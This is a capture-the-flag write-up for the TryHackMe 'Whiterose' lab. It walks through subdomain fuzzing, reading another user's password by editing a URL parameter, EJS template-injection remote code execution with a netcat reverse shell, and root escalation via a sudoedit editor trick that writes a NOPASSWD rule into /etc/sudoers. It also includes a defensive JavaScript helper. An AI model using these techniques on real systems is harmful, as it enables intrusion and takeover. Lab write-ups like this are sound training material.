TryHackMe-Whiterose-Writeup
Yet another Mr. Robot themed challenge.
Find This Room: Whiterose
Enumeration
The enumeration didn’t yield anything aside from ports 22 and 80. Fuzzing for directories proved to be unhelpful as well. Searching for CVEs consumed a lot of my time, so I switched to enumerating subdomains, but initially found nothing. However, after using the following command:
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://cyprusbank.thm/ -H "Host:FUZZ.cyprusbank.thm" -fw 1
I finally uncovered a lead.
Add the following entry to /etc/hosts:
After accessing http://admin.cyprusbank.thm/, I discovered a login page. This was straightforward, since the credentials were provided:
Olivia Cortez: olivi8
While navigating to the message option, I found some intriguing chats between Olivia and Gayle. By editing the URL to set the value of the c parameter to 0, I was able to obtain Gayle's password.
Gayle Bev: p~************:q
After logging out, I logged in as Gayle, which revealed additional information, including her phone number and more.
Search for tyrell, which gives you the answer to the first question.
Gayle has the ability to change users’ passwords, but there wasn’t anything useful there. I fired up Burp Suite to intercept the request.
Edit the parameters as you wish.
After removing the password, I encountered an interesting error that led me to this.
EJS, Server-side template injection RCE (CVE-2022-29078)
https://eslam.io/posts/ejs-server-side-template-injection-rce/
The remote code execution (RCE) related to server-side template injection (SSTI) provided a shell.
I think the code in that writeup is causing errors.
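For the defensive side of this step: CVE-2022-29078 is reachable when an Express handler forwards the whole untrusted request object into res.render(), because EJS interprets some keys of that object as rendering options instead of plain template data. The helper below is an added example (not code from the room or the writeup); the names pickLocals and ALLOWED are its own, and it assumes an app whose templates only need a few scalar fields.

```javascript
// Build the locals object for res.render() from an explicit allowlist of
// scalar fields, so request-controlled objects never reach the EJS renderer.
// ALLOWED is an assumed set of template fields for this example.
const ALLOWED = new Set(["name", "page", "query"]);

function pickLocals(source, allowed = ALLOWED) {
  const locals = {};
  const rejected = [];
  for (const key of Object.keys(source ?? {})) {
    const value = source[key];
    const scalar =
      typeof value === "string" ||
      typeof value === "number" ||
      typeof value === "boolean";
    // Nested objects/arrays (the shape an option-injection attempt needs)
    // and unknown keys are dropped and reported so the route can log them.
    if (!allowed.has(key) || !scalar) {
      rejected.push(key);
      continue;
    }
    locals[key] = String(value);
  }
  return { locals, rejected };
}

// In a route this replaces the unsafe res.render("index", req.query):
//   app.get("/", (req, res) => {
//     const { locals, rejected } = pickLocals(req.query);
//     if (rejected.length) console.warn("dropped query keys:", rejected);
//     res.render("index", locals);
//   });
```

A request that carries nested objects in its query string is worth alerting on, since normal page views never produce one.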
Append this to the intercepted request by editing the values to match yours, like this:
Got a shell
nc -lvnp 4444
listening on [any] 4444
connect to [10.17.1.187] from (UNKNOWN) [10.10.97.153] 52082
python3 -c 'import pty; pty.spawn("/bin/bash")'
web@cyprusbank:~/app$ id
id
uid=1001(web) gid=1001(web) groups=1001(web)
web@cyprusbank:~/app$
Running sudo -l returned some useful results: we can run sudoedit as root on a single file (see below).
Select the editor by using the following command:
export EDITOR="vim -- /etc/sudoers"
Run this:
sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
This opens /etc/sudoers in Vim alongside the nginx config. Edit the sudoers file to add the following line:
web ALL=(ALL:ALL) NOPASSWD: ALL
Make sure to save the file without any mistakes.
Now it’s time to escalate beyond the limits of the jail.
Run the following command:
sudo su
I have successfully escalated my privileges and am now operating as root.
The flags are located at the following paths:
/home/web/user.txt
/root/root.txt